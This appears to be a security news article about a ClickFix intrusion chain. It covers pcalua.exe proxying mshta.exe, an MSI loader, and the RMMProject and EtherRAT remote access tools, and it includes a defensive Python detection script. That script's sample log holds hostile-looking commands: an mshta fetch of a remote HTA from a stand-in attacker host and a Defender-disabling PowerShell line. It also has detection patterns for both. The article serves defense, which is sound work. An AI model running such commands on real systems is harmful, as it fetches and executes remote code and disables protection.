Hackers Exploit ClickFix for Network Infiltration
In a recent cyber attack, hackers utilized a technique known as ClickFix to infiltrate a company’s network, affecting over 11 systems. The attackers managed to deploy two distinct remote access tools before detection, showcasing the severe risks posed by seemingly innocuous user prompts.
The ClickFix technique involves tricking users into entering a command into the Windows Run dialog via a misleading prompt on a compromised website. This tactic capitalizes on users’ tendency to follow authoritative-looking instructions, facilitating unauthorized access to systems.
Understanding the ClickFix Technique
Researchers at Huntress first identified this sophisticated attack in May 2026. They traced the intrusion from a single, unmonitored endpoint that lacked sufficient security measures, leading to a hands-on-keyboard attack across the entire network. The initial breach occurred when a user accessed a compromised site and executed a command using pcalua.exe, a legitimate, signed Windows binary.
This command initiated a script that covertly downloaded and installed an MSI package, unbeknownst to the user. The package included a custom loader named Potemkin, which established a connection to a command-and-control server, subsequently loading a remote access tool known as RMMProject directly into memory.
Advanced Malware Deployment
In addition to RMMProject, the attackers utilized EtherRAT, a Node.js-based backdoor that retrieves server addresses from the Ethereum blockchain. This makes it challenging to disrupt using conventional domain takedowns. The attack escalated with the deployment of EtherRAT across multiple hosts via WMIExec and SMBExec, overcoming defenses such as Windows Defender in the process.
The ClickFix attack chain commenced with a command exploiting pcalua.exe to proxy mshta.exe, which fetched a remote HTA file. This HTA payload downloaded and executed the MSI installer, inst24.msi, without user awareness. Potemkin was then installed in the user’s AppData folder, ensuring persistence through reboots by registering a startup key.
Mitigation and Preventive Measures
Huntress emphasized the importance of auditing endpoint coverage to prevent such intrusions. The attack began on a machine lacking a monitoring agent, underscoring the need for comprehensive endpoint protection. Disabling the Windows Run dialog via Group Policy can effectively block the ClickFix entry point, as the attack relies on user-initiated command execution.
Organizations are advised to monitor endpoints for the cloudflared tunneling client, including renamed or altered copies of it, and to treat any attempt to disable Windows Defender as a high-confidence threat indicator. Huntress recommends maintaining rigorous security protocols and staying vigilant to prevent similar breaches in the future.
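The detection guidance above (pcalua.exe proxying mshta.exe as the ClickFix entry point, cloudflared or renamed copies of it, and attempts to disable Windows Defender) can be expressed as three simple rules over process-creation telemetry. The following is an added example written for this article, not code from Huntress or from the incident report; the pipe-delimited log format, the sample lines, the rule names and the attacker.invalid hostname are all constructed for illustration. Renamed copies of cloudflared are caught by matching the OriginalFileName field from the PE version resource rather than the on-disk file name.

```python
"""
Three detection rules for the ClickFix chain described above, run over a few
constructed process-creation log lines (not real telemetry).

Rules (names are assumptions for this example):
  1. clickfix_pcalua_mshta_proxy   pcalua.exe used to launch mshta.exe
  2. cloudflared_tunnel_client     cloudflared, including renamed copies,
                                   identified via OriginalFileName
  3. defender_disable_attempt      command lines that turn off Defender
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    original_file_name: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    # Constructed format: "Key=Value|Key=Value|..." with maxsplit=1 so that
    # '=' inside a command line does not break the field.
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessEvent(
        parent_image=fields.get("ParentImage", ""),
        image=fields.get("Image", ""),
        original_file_name=fields.get("OriginalFileName", ""),
        command_line=fields.get("CommandLine", ""),
    )


def _basename(path: str) -> str:
    # Normalise Windows paths and compare file names case-insensitively.
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Set-MpPreference -Disable...  $true, or the registry-style value names.
DEFENDER_DISABLE = re.compile(
    r"(set-mppreference\s+.*-disable\w*\s+\$?true|"
    r"disableantispyware|disablerealtimemonitoring)",
    re.IGNORECASE,
)


def classify(ev: ProcessEvent) -> list[str]:
    hits: list[str] = []
    parent = _basename(ev.parent_image)
    image = _basename(ev.image)
    cmd = ev.command_line.lower()

    # Rule 1: either side of the proxy relationship is suspicious on its own:
    # pcalua.exe invoked with mshta in its arguments, or mshta.exe whose
    # parent is pcalua.exe.
    if (parent == "pcalua.exe" and image == "mshta.exe") or (
        image == "pcalua.exe" and "mshta" in cmd
    ):
        hits.append("clickfix_pcalua_mshta_proxy")

    # Rule 2: match on OriginalFileName so a copy renamed to e.g. svchost.exe
    # is still flagged.
    if ev.original_file_name.lower() == "cloudflared.exe" or image == "cloudflared.exe":
        hits.append("cloudflared_tunnel_client")

    # Rule 3: any attempt to switch Defender off is a high-confidence indicator.
    if DEFENDER_DISABLE.search(cmd):
        hits.append("defender_disable_attempt")
    return hits


# Constructed sample telemetry; line 5 is benign and should produce no hits.
SAMPLE_LOG = """\
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\pcalua.exe|OriginalFileName=pcalua.exe|CommandLine=pcalua.exe -a mshta.exe https://attacker.invalid/page.hta
ParentImage=C:\\Windows\\System32\\pcalua.exe|Image=C:\\Windows\\System32\\mshta.exe|OriginalFileName=MSHTA.EXE|CommandLine=mshta.exe https://attacker.invalid/page.hta
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Users\\u\\AppData\\Roaming\\svchost.exe|OriginalFileName=cloudflared.exe|CommandLine=svchost.exe tunnel run
ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|OriginalFileName=PowerShell.EXE|CommandLine=powershell -c Set-MpPreference -DisableRealtimeMonitoring $true
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Program Files\\Notepad++\\notepad++.exe|OriginalFileName=notepad++.exe|CommandLine=notepad++.exe notes.txt
"""


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, rule hits) for every line that triggers a rule."""
    findings: list[tuple[int, list[str]]] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        hits = classify(parse_event(line))
        if hits:
            findings.append((n, hits))
    return findings


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Running the block prints one finding per flagged line; the benign notepad++ line produces nothing. In a real deployment the same three predicates map directly onto Sysmon Event ID 1 or Windows Security Event 4688 fields (ParentImage, Image, OriginalFileName, CommandLine), and the pcalua-to-mshta parent/child rule is the one that catches the ClickFix entry point itself, before the MSI or any RAT is involved.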
Conclusion
This incident highlights the sophistication of modern cyber threats and the necessity for robust security measures. By understanding the mechanics of attacks like ClickFix, organizations can better prepare and protect their networks from similar exploits. Continuous monitoring and updating of security practices remain crucial in safeguarding against evolving threats.
